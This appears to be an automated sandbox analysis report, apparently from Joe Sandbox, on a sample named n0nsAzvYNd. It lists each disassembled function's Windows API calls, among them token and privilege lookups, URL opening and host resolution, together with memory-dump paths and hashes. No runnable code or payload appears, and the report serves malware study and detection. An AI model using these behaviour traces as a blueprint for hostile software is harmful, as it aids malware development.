Part of subcall function 003A2612: GetWindowLongW.USER32(?,000000EB), ref: 003A2623

GetCursorPos.USER32(?), ref: 0042C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003DB9AB,?,?,?,?,?), ref: 0042C4E7
GetCursorPos.USER32(?), ref: 0042C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003DB9AB,?,?,?), ref: 0042C56E

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 275abb00e1b3ea7743bc753eb2253e39cd3e2821209bb8f25fbbe9b6c7208ad1
Instruction ID: 0bbf4417ea0e54f206bf89a1f80c69491cca8535e732f9a7874cf29fd5f58071
Opcode Fuzzy Hash: 275abb00e1b3ea7743bc753eb2253e39cd3e2821209bb8f25fbbe9b6c7208ad1
Instruction Fuzzy Hash: 5631BF35600028FFCB259F58D898EAF7BF5EB09350F84406AF9058B361C735A991DBA8

Function 003F8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003F810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003F8121
Part of subcall function 003F810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003F812B
Part of subcall function 003F810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003F813A
Part of subcall function 003F810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003F8141
Part of subcall function 003F810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003F8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003F86A3
_memcmp.LIBCMT ref: 003F86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 003F86FC
HeapFree.KERNEL32(00000000), ref: 003F8703

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: a6500fb75d1b52dd96f3ee920ed7755df9e626dc80dc21b45050fc7a697f6cd2
Instruction ID: 8367bf3926c2c99fb33e0af613fbc13392dfa61ac56ea183a5bcd03af4eecd87
Opcode Fuzzy Hash: a6500fb75d1b52dd96f3ee920ed7755df9e626dc80dc21b45050fc7a697f6cd2
Instruction Fuzzy Hash: BC216B72E00108EBDB15DFA4C949BFEB7B8EF44304F554069E644AB241EB30AE05CB50

Function 003C098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 003C09AE

Part of subcall function 003A5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00407896,?,?,00000000), ref: 003A5A2C
Part of subcall function 003A5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00407896,?,?,00000000,?,?), ref: 003A5A50

_fprintf.LIBCMT ref: 003C09E5
OutputDebugStringW.KERNEL32(?), ref: 003F5DBB

Part of subcall function 003C4AAA: _flsall.LIBCMT ref: 003C4AC3

__setmode.LIBCMT ref: 003C0A1A

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: b2fb1e0fbd32343e9eb50e410356159d8cd2e0e4b138432940def99b949899f7
Instruction ID: e4c08cfa4875682bc44c1b605aa979c75cc8e0bd0a54d28adfdcb2c75bfe23ca
Opcode Fuzzy Hash: b2fb1e0fbd32343e9eb50e410356159d8cd2e0e4b138432940def99b949899f7
Instruction Fuzzy Hash: 39110535604248ABDB06B3B49C46FBE776CDF46320F20006EF205AB192EE755C5647A5

Function 00411767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004117A3

Part of subcall function 0041182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0041184C
Part of subcall function 0041182D: InternetCloseHandle.WININET(00000000), ref: 004118E9

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 4890e7058b1b40d6e3147e6977952af82a5d9cf7f032c44278dc3ec878b39179
Instruction ID: 9536011145ba022713f9a4ed8cb9e283e6fcebb185a63dfed61d66c95c1484c0
Opcode Fuzzy Hash: 4890e7058b1b40d6e3147e6977952af82a5d9cf7f032c44278dc3ec878b39179
Instruction Fuzzy Hash: FA219235200605BFEB12AF60DC41FFBBBA9FF88710F50402FFA1196660D775986297A9

Function 00403A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0042FAC0), ref: 00403A64
GetLastError.KERNEL32 ref: 00403A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00403A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0042FAC0), ref: 00403ADF

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 9d61cb3d20d3d5c0061b2585be144f352b946ee97dc40f7bac3dfa68f226519a
Instruction ID: 2971f9bb59f76f0d6249479c69eb5e67a54ef8fbfef8245e7e6bf5b80e985d0c
Opcode Fuzzy Hash: 9d61cb3d20d3d5c0061b2585be144f352b946ee97dc40f7bac3dfa68f226519a
Instruction Fuzzy Hash: 1721B6342082018FC710DF28C88186B7BF8EE56365F504A3EF499D72D1D7359A0ACF56

Function 003FDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003FF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,003FDCD3,?,?,?,003FEAC6,00000000,000000EF,00000119,?,?), ref: 003FF0CB
Part of subcall function 003FF0BC: lstrcpyW.KERNEL32(00000000,?,?,003FDCD3,?,?,?,003FEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003FF0F1
Part of subcall function 003FF0BC: lstrcmpiW.KERNEL32(00000000,?,003FDCD3,?,?,?,003FEAC6,00000000,000000EF,00000119,?,?), ref: 003FF122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,003FEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003FDCEC
lstrcpyW.KERNEL32(00000000,?,?,003FEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003FDD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,003FEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003FDD46

Strings

cdecl, xrefs: 003FDD3D

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 54aa2c051c616b127d7db23d0e4df02d928895e9fbc19becddfa98a1aea8c200
Instruction ID: 99c9eccad259bdbc0f8b12948d5a04996973d8534f3f1cad3172192666dd5746
Opcode Fuzzy Hash: 54aa2c051c616b127d7db23d0e4df02d928895e9fbc19becddfa98a1aea8c200
Instruction Fuzzy Hash: 57118136200309EFCB26AF74D849E7A77A9FF45350B81403AFA06CB2A0EB719C51C795

Function 003D50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 003D5101

Part of subcall function 003C571C: __FF_MSGBANNER.LIBCMT ref: 003C5733
Part of subcall function 003C571C: __NMSG_WRITE.LIBCMT ref: 003C573A
Part of subcall function 003C571C: RtlAllocateHeap.NTDLL(00DD0000,00000000,00000001,00000000,?,?,?,003C0DD3,?), ref: 003C575F

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: fb217e2180800b0c2ae93fbccd9f6f938570bd5ea93d9400d3b8299883de7028
Instruction ID: 255876d42ce33a0f6d3df038811532170be275ed9d7d547fb6fbf3786ffe7686
Opcode Fuzzy Hash: fb217e2180800b0c2ae93fbccd9f6f938570bd5ea93d9400d3b8299883de7028
Instruction Fuzzy Hash: EF11A073904A11AECF332FB4BC45B5E3BA8AB143A1B21453FF909DA350DE708D418794

Function 003A44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003A44CF

Part of subcall function 003A407C: _memset.LIBCMT ref: 003A40FC
Part of subcall function 003A407C: _wcscpy.LIBCMT ref: 003A4150
Part of subcall function 003A407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003A4160

KillTimer.USER32(?,00000001,?,?), ref: 003A4524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003A4533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003DD4B9

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: aabd2f7378b12c66e5f6621b93ee8f67087ad56d65fb028f00ef43a66012926c
Instruction ID: a1c9cce897ef967c2c33c07d39f2d6d95a18bfc31efe1feefab89039affee4b2
Opcode Fuzzy Hash: aabd2f7378b12c66e5f6621b93ee8f67087ad56d65fb028f00ef43a66012926c
Instruction Fuzzy Hash: 2B21F575904784AFE7338B249855BE7BBFCEB52308F0400AEE69A56241C7B42A88CB41

Function 00416369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 003A5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00407896,?,?,00000000), ref: 003A5A2C
Part of subcall function 003A5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00407896,?,?,00000000,?,?), ref: 003A5A50

gethostbyname.WSOCK32(?), ref: 00416399
WSAGetLastError.WSOCK32(00000000), ref: 004163A4
_memmove.LIBCMT ref: 004163D1
inet_ntoa.WSOCK32(?), ref: 004163DC

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 91e6d8c06c62f3f7751f254fceefcba8944f2b7ef0cb9cb62073435c5d329ef1
Instruction ID: 50a24cb1be887698defa199b0bc879ff38b19b492376c8063a5038c3889ae7a8
Opcode Fuzzy Hash: 91e6d8c06c62f3f7751f254fceefcba8944f2b7ef0cb9cb62073435c5d329ef1
Instruction Fuzzy Hash: 56114C32600109AFCB05FBA4D946DEFB7B8EF09310B54407AF506BB262DB30AE15DB65

Function 003F8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 003F8B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 003F8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 003F8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 003F8BA4

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cdd6eae9e1e60d201daae6ddb115d368821d8a83c22b00a848373d50f9d58fea
Instruction ID: ff2b5ae8b0b59367c0c25d002b7167611fa18c32e9e4b894ea94d2bdd79c21a6
Opcode Fuzzy Hash: cdd6eae9e1e60d201daae6ddb115d368821d8a83c22b00a848373d50f9d58fea
Instruction Fuzzy Hash: 09111879901218FFEB11DFA5CC85FADBBB8FB48710F2040A5EA00B7290DA716E11DB94

Function 003A1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 003A2612: GetWindowLongW.USER32(?,000000EB), ref: 003A2623

DefDlgProcW.USER32(?,00000020,?), ref: 003A12D8
GetClientRect.USER32(?,?), ref: 003DB5FB
GetCursorPos.USER32(?), ref: 003DB605
ScreenToClient.USER32(?,?), ref: 003DB610

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: e942cf1b0b6c8d58a8fc58ced2835415fbbd15a5fa4f5decfc4042c6c6630818
Instruction ID: eb634ea9f6beb6deb48973df92a422a40298c8c14b7b03aa2070923e150565d8
Opcode Fuzzy Hash: e942cf1b0b6c8d58a8fc58ced2835415fbbd15a5fa4f5decfc4042c6c6630818
Instruction Fuzzy Hash: 9C113D35600019FFCB11EF98D989AEE77B8EB0A301F800866F901E7151D730FA568BA9

Function 003FD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003FD84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003FD864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003FD879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003FD897

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 11e9d3ab0774b77e9b61ea78c6a73331f396575f53787d57e1cc6d4942e3e60e
Instruction ID: 2a886ed1fb8128eee3c631311571f236cd9d8da9fce3ad4f5122217f710710d7
Opcode Fuzzy Hash: 11e9d3ab0774b77e9b61ea78c6a73331f396575f53787d57e1cc6d4942e3e60e
Instruction Fuzzy Hash: D4115BB5605308EBE321AF50EC0CFA6BBBDEB00B40F508579EA16D6550D7B0E9499FA1

Function 003D6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 003D6FDB

Part of subcall function 003D76C2: __fltout2.LIBCMT ref: 003D76EB

__cftog_l.LIBCMT ref: 003D7001
__cftoe_l.LIBCMT ref: 003D7033

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: dda2c71edc6683e1c9a9febb86b3425398bf8260c05ee2835c9453dca07f1ad2
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: E7014C7344814ABBCF175F84EC01CEE3F66BB18350F598456FE1858271E236C9B1AB81

Function 0042B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0042B2E4
ScreenToClient.USER32(?,?), ref: 0042B2FC
ScreenToClient.USER32(?,?), ref: 0042B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042B33B

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 6ef301fc5dc6b8ef90f408ccac9e8fafe1cd913d047ded495ddd94b61236776e
Instruction ID: f00448f34305d805a5e31de0e0de9ee232474960dd8dec08b62a3c65c0676997
Opcode Fuzzy Hash: 6ef301fc5dc6b8ef90f408ccac9e8fafe1cd913d047ded495ddd94b61236776e
Instruction Fuzzy Hash: CC117775D00209EFDB11CF99D444AEEBBF5FF08310F504166E914E3620D735AA558F94

Function 00406BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00406BE6

Part of subcall function 004076C4: _memset.LIBCMT ref: 004076F9

_memmove.LIBCMT ref: 00406C09
_memset.LIBCMT ref: 00406C16
LeaveCriticalSection.KERNEL32(?), ref: 00406C26

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: e03836ca3c6bfa9ba49f5bf199f4bca8114e3fbb6c9ec23d6eb53dc8219eea56
Instruction ID: 7c29ed9f3006c8350eed30cd045ecaedd1bd2649a4e5385cd429ab745acfce5f
Opcode Fuzzy Hash: e03836ca3c6bfa9ba49f5bf199f4bca8114e3fbb6c9ec23d6eb53dc8219eea56
Instruction Fuzzy Hash: 6EF0363A200100ABCF016F55DC85E46BB25EF45324B448075FD095E156C735A811CBB4

Function 003A2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 003A2231
SetTextColor.GDI32(?,000000FF), ref: 003A223B
SetBkMode.GDI32(?,00000001), ref: 003A2250
GetStockObject.GDI32(00000005), ref: 003A2258
GetWindowDC.USER32(?,00000000), ref: 003DBE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 003DBE90
GetPixel.GDI32(00000000,?,00000000), ref: 003DBEA9
GetPixel.GDI32(00000000,00000000,?), ref: 003DBEC2
GetPixel.GDI32(00000000,?,?), ref: 003DBEE2
ReleaseDC.USER32(?,00000000), ref: 003DBEED

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: c98d1626b2c7a5b0a428be140df312d0729f42fd311550c409e1f001aa2e947e
Instruction ID: 3417ed0395da784b1c8d803282bde6c4cdae1a37efa56de984afd4d4c3d75389
Opcode Fuzzy Hash: c98d1626b2c7a5b0a428be140df312d0729f42fd311550c409e1f001aa2e947e
Instruction Fuzzy Hash: ACE03032204144EADB215FA4FC0DBE87B20EB05332F818376FA69480E187714995DB11

Function 003F8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 003F871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,003F82E6), ref: 003F8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003F82E6), ref: 003F872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,003F82E6), ref: 003F8736

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

